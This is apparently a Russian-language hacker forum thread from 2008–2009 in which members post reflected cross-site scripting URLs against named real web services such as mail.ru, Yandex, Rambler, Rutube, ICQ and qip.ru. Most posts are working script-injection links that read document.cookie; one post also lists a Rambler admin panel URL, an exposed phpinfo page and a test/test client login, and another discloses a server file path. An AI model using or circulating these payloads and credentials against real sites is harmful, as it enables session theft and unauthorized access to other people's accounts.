Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Мой Круг [Яндекс]

     
    1 person likes this.
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    [email protected]

     
    2 people like this.
  3. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    МИРТЕСЕН

    Code:
    http://mirtesen.ru/groups/map#search&<script>alert(document.cookie)</script>
    Прошу модераторов простить меня за то, что я отхожу от тематики почтовых серверов- но думаю, социальные сети можно приравнять к ним по важности.
     
  4. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Снова i.ua - на этот раз пассивка ;)

    http://events.i.ua/search/?words=</title>XSS&type=text
     
  5. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    http://mail.kinozal.tv/

    http://kinozal.tv/login.php?returnto={XSS}
     
  6. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    http://webmail.rin.ru/

    http://search.rin.ru/?text={XSS}
     
  7. Zikko

    Zikko New Member

    Joined:
    24 Feb 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    на сайте http://www.mylivepage.ru в поле для поиска
     
  8. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    META.UA (Поисковик, почта...)

    Ну и так, в придачу rutube.ru :D + раскрытие путей

    http://ru tube.ru/channels.html?dir=asc&order_by=alias%22%3E%3Cimg%20src=javascript:alert(document.cookie)%3E
    /var/virtual/rutube.ru/lib/Rutube/Obj/Channel.pm line 658
     
    #28 Dimi4, 27 Jan 2009
    Last edited: 27 Jan 2009
    2 people like this.
  9. Sin3v

    Sin3v Banned

    Joined:
    16 Jul 2008
    Messages:
    11
    Likes Received:
    95
    Reputations:
    9
    Mail.ru
     
  10. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    e-mail.ru

    Найдена лично мной
     
  11. Sin3v

    Sin3v Banned

    Joined:
    16 Jul 2008
    Messages:
    11
    Likes Received:
    95
    Reputations:
    9
    e-mail.ru

    А это лично мной)
     
  12. MaDfUn

    MaDfUn Elder - Старейшина

    Joined:
    2 Feb 2007
    Messages:
    28
    Likes Received:
    10
    Reputations:
    0
    Работает в IE
    Code:
    http://sysadmin.mail.ru/pforum/profile.php?mode=viewprofile&u="><script>alert(/xss/)</script> 
     
  13. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    A.UA - унылый веб2.0 сервис (бета)
    и так далее
     
    #33 iddqd, 18 Feb 2009
    Last edited: 18 Feb 2009
  14. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    Rambler

    тестил в Опере
     
  15. serfertty

    serfertty Guest

    Reputations:
    0
    yandex
    Code:
    http://old-kubok.yandex.ru/cgi/cert.pl?s=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
    
     
    2 people like this.
  16. иддкд

    иддкд Banned

    Joined:
    27 Mar 2009
    Messages:
    21
    Likes Received:
    31
    Reputations:
    0
    http://gallery.icq.com/browse.php?search=search&term=%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    1 person likes this.
  17. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    phpinfo
    http://fo2.rambler.ru/info.php phpinfo

    хсс
    http://help.rambler.ru/feedback.html?s=7715&fio=%22%3E%3Cscript%3Ealert(/2fed/)%3C/script%3E

    админка
    http://in.fo2.rambler.ru/administrator/index.php?

    и ещё
    http://ad.rambler.ru/
    CLIENTS LOGIN

    логин=test
    пасс=test
     
    2 people like this.
  18. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Пассивка на mail.ru, работает онли в хроме:

    Code:
    http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,501,20,9&element=1&code="><script>alert(document.cookie)</script>
     
    3 people like this.
  19. FatalLerr0r

    FatalLerr0r Member

    Joined:
    15 Apr 2009
    Messages:
    33
    Likes Received:
    6
    Reputations:
    0
    Пассивка на qip.ru
    http://video.qip.ru/broadcast/view/?id=2172438&from="><script>alert('XSS by FatalLerr0r')</script>
     
  20. Sin3v

    Sin3v Banned

    Joined:
    16 Jul 2008
    Messages:
    11
    Likes Received:
    95
    Reputations:
    9
    Mail.ru
    Работает через пост запрос в поле E-Mail
     
    #40 Sin3v, 26 Jul 2009
    Last edited: 26 Jul 2009